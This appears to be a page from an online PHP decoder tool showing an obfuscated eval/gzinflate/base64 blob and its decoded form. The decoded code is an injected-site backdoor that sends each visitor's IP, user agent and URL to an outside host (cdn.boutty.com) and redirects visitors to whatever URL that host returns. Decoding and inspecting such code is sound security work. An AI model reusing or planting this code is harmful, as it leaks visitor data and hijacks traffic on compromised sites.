Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<? eval(gzinflate(base64_decode(' jVVbb9owFH5H4j94VSQnEgONXVVGUUXTFokBC0lf UGWliSmegp3Zz..
Decoded Output download
?><?php
function get_client_ip() {
$ip = $_SERVER['REMOTE_ADDR'];
if (isset($_SERVER['HTTP_CF_CONNECTING_IP'])) {
$ip = $_SERVER['HTTP_CF_CONNECTING_IP'];
}
return $ip;
}
$client_ip = get_client_ip();
function get_client_domain() {
$domain = $_SERVER['HTTP_HOST'];
if (isset($_SERVER['HTTP_CF_VISITOR'])) {
$cf_visitor = json_decode($_SERVER['HTTP_CF_VISITOR'], true);
if (isset($cf_visitor['host'])) {
$domain = $cf_visitor['host'];
}
}
return $domain;
}
$client_domain = get_client_domain();
$uri = isset($_SERVER['HTTP_CF_REQUEST_URI']) ? $_SERVER['HTTP_CF_REQUEST_URI'] : $_SERVER['REQUEST_URI'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$data = $client_ip . '|' . $user_agent . '|' . $uri . '|' . $client_domain;
$md5 = '278';
$encoded_data = base64_encode($md5 . $data);
$url = 'https://cdn.boutty.com/index.php';
$data = array('encoded_data' => $encoded_data);
$options = array(
CURLOPT_URL => $url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($data),
CURLOPT_RETURNTRANSFER => true,
);
$curl = curl_init();
curl_setopt_array($curl, $options);
$result = curl_exec($curl);
curl_close($curl);
if ($result !== 'sai') {
header("Location: " . $result);
exit;
} else {
$pathParts = explode('/', $uri);
if (count($pathParts) >= 3) {
$path2 = $pathParts[2];
$trimmedPath2 = rtrim($path2, $path2[strlen($path2) - 1]);
$pathParts[2] = $trimmedPath2;
}
$newUri = implode('/', $pathParts);
$fullUrl = 'https://' . $client_domain . $newUri;
$content = file_get_contents($fullUrl);
echo $content;
exit;
}
?><?
Did this file decode correctly?
Original Code
<? eval(gzinflate(base64_decode('
jVVbb9owFH5H4j94VSQnEgONXVVGUUXTFokBC0lf
UGWliSmegp3Zzka19b/PFwgJ0G08gHwu3znfuTG4
+DzIV3mz0WwsC5pIwih4xBIlGcFUIpK7HvjVbAD1
cUgO+sBBcz+484MFDPwv09BHl1dXAbzvWRuyBC4R
Akt3b3cbhjM0vEbD6WTiD8PR5AaNZvDeK4FPgb/g
tA3zbH84lgWn2lfJnzUHp8xboR3w6L1EMmXrmNAK
USs4zud2Og//i+rdaD4Kp8ERyWSJfhBBJOMK/Jtg
FKU4YSn+G0QLSF5gr7eHqUTeAy7gigl5GPGAzrF5
Bfb5ZG2t82F9S8gTZTR1dgpOlPqlAgX+18ifhygK
RiplMAD/MAHntcGraHo6lsAcxY8qieOeReqFLm/8
ie2ck8YyNqUoB6UN4G+ovqswe5miUT5qRDXYOn2v
sGD34yeon5jqZqZoG+MhFvjDO2SlrjFWIFrpmax5
pp1XUubivNNJUtp+YIWUT+2ErTuEpnjTVqsJK1nH
nMdPLqzGgaB/AWqRDTjL9ZSL0sc2dRgF4+lMV25s
3FQKrbpmpkZcq/TMnVBdj/zx1Vwb6LTRQ0GyFH0v
MH9yLbEDn8APo2ASBpeT+bUfVIBNkoktgf5BhBJp
Zse81NQoBsjmbuxaYMfJuHIsikzunPEGJ9asREgy
JvBe1mzordm5veqrwouYwHJZVjhOMXfPxiyJdZRz
cKabZe13y4c3ROpNADgTuLwWeSxXs5hLXWy8yTPd
bNiBLTM8XuVaJKygahlKew9c9MHb+oXQyq6ez9Jq
0a0uqSM5Wa9xOtvacf22mN3W1n0hJM8w3Uo98Bq8
ua/ejxq2jlXFrF9Yh+Kfkd3kdZXZnsPW3lkWWRbV
J/p4Z7TAIu7cEkal3dslyTAy58SKhLvDLMufrFjp
YXpabYp5NxsD9Yf2Bw==
'))); ?>
Function Calls
gzinflate | 1 |
base64_decode | 1 |
Stats
MD5 | 32fdaa1ee39e9f253ee829169ebefe2d |
Eval Count | 1 |
Decode Time | 51 ms |